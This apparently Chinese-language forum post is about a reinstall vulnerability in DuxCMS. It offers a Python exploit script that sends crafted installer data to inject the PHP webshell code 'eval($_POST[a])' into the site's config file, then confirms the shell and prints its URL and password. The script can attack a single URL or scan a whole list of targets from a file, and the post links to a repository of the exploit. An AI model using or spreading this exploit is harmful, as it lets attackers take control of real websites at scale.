针对的是不久发的
duxcms重装漏洞并且getshell(这个可以无视GPC)
直接发EXP,之前想写的,写了一半就没写了,后来胎哥又写出来了,思路一样,直接提交POST数据,代码如下:
import requests from sys import argv def getshell(): ip = argv[2] port = argv[4] user = argv[6] passwd = argv[8] data = {"DB_HOST":ip,"DB_PORT":port,"DB_NAME":"duxcms","create":"1","DB_USER":user,"DB_PWD":passwd,"DB_PREFIX":"dc_","spot":"2PL4T_';phpinfo();eval($_POST[a]);echo 'test666123x';#","KEY":"AHT0CALHM0_"} if argv[9]=='-u': try: r = requests.post(argv[10]+'/install/install.php',data=data,timeout=5) y = requests.get(argv[10]+'/inc/data.php',timeout=5) if ('test666' in y.text): print 'shell: ' + y.url + ' pass:a' else: print "does not exist" except: print "does not exist" elif argv[9]=='-f': for i in open(argv[10]).read().split('\n'): #print i try: r = requests.post(i+'/install/install.php',data=data,timeout=5) y = requests.get(i+'/inc/data.php',timeout=5) if ('test666' in y.text): print 'shell: ' + y.url + ' pass:a' else: print "does not exist" except: pass if __name__=="__main__": if len(argv)<10: print ''' test.py -p 127.0.0.1 -o 3306 -u root -m root -f 1.txt test.py -p 127.0.0.1 -o 3306 -u root -m root -u http://127.0.0.1/test/''' else : getshell()
git源:
https://github.com/0xTback/duxcmsexp